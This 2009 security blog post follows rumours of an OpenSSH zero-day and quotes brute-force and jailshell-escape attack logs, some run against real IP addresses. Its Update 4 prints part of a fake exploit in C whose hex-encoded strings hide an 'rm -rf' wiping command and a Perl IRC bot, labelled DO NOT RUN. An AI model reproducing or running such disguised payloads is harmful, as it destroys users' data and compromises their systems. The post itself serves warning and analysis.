«
»

OpenSSH 0day?


Rumors are flying of an underground openssh exploit. After some digging we find the tool name and its group:

“./0pen0wn” or “./0penPWN” by the hacker group called “anti-sec.” Check the commands below: 

anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt
	[+] openPWN - anti-sec group
	[+] Target: 66.96.220.213
	[+] SSH Port: 2222
	[+] List: users.txt

	[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

and:


anti-sec: ~ / pwn / xpl # ./0pen0wn-h 66.197.143.133-p 22
[+] 0wn0wn – anti-sec group [+] 0wn0wn - anti-sec group
 [+] Target: 66.197.143.133 [+] Target: 66.197.143.133
 [+] SSH Port: 22 [+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

Two attack logs exist on the net with this supposed exploit, both by this group. The first is an attack on an Astalavista Admin:

http://romeo.copyandpaste.info/txt/nowayout.txt

The second attack is the one the Internet Storm Center blogged on which can be seen in its entirety here:

http://tinyurl.com/l8tzba

and a Russian site has a play by play of the attack here:

http://tinyurl.com/m7cqdh

A Belgian Blog has this to say about it:

There have been a splash of openssh attacks and scanning – even in Belgium – and nobody seems to know what and why. There are some rumors and there is some discussion over at the Internet Storm Center but it is not all clear yet. The rumor is that a Zero day has been discovered for OLDER versions of Open SSH. This means there is no patch – but you can upgrade which will solve the issue.

I know it is a lot of work but it is work that you have to do otherwise there will be much more other work that you will have to do when you become the stupid victim of an announced attack.

Do the right think. Upgrade to the latest versions

ps what is strange about the openSSH scans is that they are scanning a whole set of ports, not only the traditional ones. Maybe to find the diverting tactics (by chosing another port not to be found while scanning). Means they are smart these guys.

Rumor tells us that Black Hat US may be the place where more information would be launched about this attack. That promises. It looks like this blackhat conference will become a hell of a show…

Update 1:

ISC has a thrid update saying this:

We’ve received a few emails that lend credibility to the rumor, and we’ve received a few more that paint an interesting picture – that the reports are all part of a cover-up to hide another breach that was caused by a sysadmin’s mistake.  What we are lacking is the actual exploit code.  So if this is “for real” would somebody slip us a copy and leave it under the door mat?  (Actually, our contactform is the best place.)  We won’t tell anybody where it came from but it sure would put a lid on this story.

If you look at the first attack log the ./0pen0wn script drops them into a jailshell which they have to escape to get get at the box. This might have some insight on the exploit? They use ./MichaelScofield script (pun because hes a character in the tv series prison break) to get  /bin/sh and go after passwords, etc.

sh-3.1$ ./MichaelScofield

	[+] MichaelScofield - Prison Breaker / anti-sec group
	[+] Grabbing environment variables...

	SHELL=/usr/local/cpanel/bin/jailshell

	[+] Injecting new shell..

	[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

	SHELL=/bin/sh

Update 2 from ISC handler Bojan Zdrnja.

For the last couple of days we’ve been all witnesses of FUD surrounding a supposed 0-day exploit for OpenSSH skyrocketing.

At this moment, it definitely looks like we’re dealing with a hoax – even more, it’s not the first time someone said they have a 0-day exploit for SSH. So, let’s see some facts about this.

It appears that the whole story started after a post to the Full-Disclosure mailing list on the 4th of July (http://seclists.org/fulldisclosure/2009/Jul/0028.html). The post supposedly shows a hacker group using a 0-day exploit for SSH to compromise a server. After doing some research here, it appears that this is a long standing argument between two guys (or groups). One of our readers submitted the following URL address (http://flx.me/astahack2.txt), which shows another hack.

The “exploit” used in that file is a brute force attack for sure, as can be seen below:

anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt

See the “-l” option? That supplies the list of users it will try to brute force.
Additionally, a bit below it even prints which user was hacked:

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

user: crownvip
uname: Linux srv01.webhostline.com
2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux

Now, what has been posted on the Full-Disclosure list (the supposed
exploit) looked like this:

anti-sec:~/pwn/xpl# ./0pen0wn -h xx.yy.143.133 -p 22

Same group, same server, same directory – different file name. Why didn’t they use the mighty 0-day first time? They brute forced into the server and then had to jail break.
This looks very much like a hoax to me – and this is the only evidence we have about a 0-day? A post from an anonymous e-mail address (hushmail) to the Full-Disclosure mailing list (which, we all have to admit, isn’t the best source of verified information)? And this was even enough for some web hosting companies to *shut down* their SSH service? I find this unbelievable.

Finally, OpenSSH developers would probably agree with me – one of the developers sent an e-mail to the Openssh-unix-dev mailing list (http://lwn.net/Articles/340483/) also stating the obvious.

So, I’d like to ask everyone not to spread the FUD anymore. Every piece of evidence we received so far points only to brute force attacks on SSH servers (which have been around for years!). Do keep an eye on your server and install all patches. We will post more information if we receive it, but until then I think there was enough of this FUD.

Update 3 (jeez i know)

Seems everyones agreed its a new bruteforce tool.

The director of the ISC said that the vuln had merit, then Bojan an ISC handler and pentester commented about FUD. In the meanwhile imageshack was pwnt by the same group

I don’t wanna spread FUD but  I’d suggest following these steps given by ISC readers:

-Make sure SSH is updated

-Audit your own SSH password

-Lock down SSH on the hardware firewall level to come only from authorized IP addresses

-hosts.deny or iptables active response

-Use a port-knocking system especially on the SSH service

-Portsentry listens on port 22, while openSSH-server has another port. ban port 22 connections via portsentry and iptables

Bottom Line:
It may just be a new type of bruteforce, it may be something else, best be prepared anyways =)

Update 4

Fake code captured from SANS Netwars competition, it opens you to an IRC channel AND Reformats your drive!! DO NOT RUN:

/* 0pen0wn.c by anti-sec group
 * ---------------------------
 * OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
 *
 *
 * Takes advantage of an off-by-one
 * bug in mapped authentication space on system
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
    "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

char shellcode[] =
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
 ... Truncated for your protection

This entry was posted on Tuesday, July 7th, 2009, 6:21 pm and is filed under Uncategorized. You can follow any responses to this entry through RSS 2.0. You can leave a response, or trackback from your own site.

  1. #1 by Yujin - July 14th, 2009 at 14:49

    Code in Update 4 will do an “rm -rf /” if you run. I compile and run the code, after that computer do not boot. I understand why some says never use root. As a RedHat user, i always like to login as root.

    Quote

  2. #2 by xanda - July 19th, 2009 at 09:16

    @Yujin make sure you check the payload before run any exploit after this :) For the exploit you’ve run, maybe you can see the clearer payload here http://blog.xanda.org/?p=851

    Quote
(will not be published)
  1. No trackbacks yet.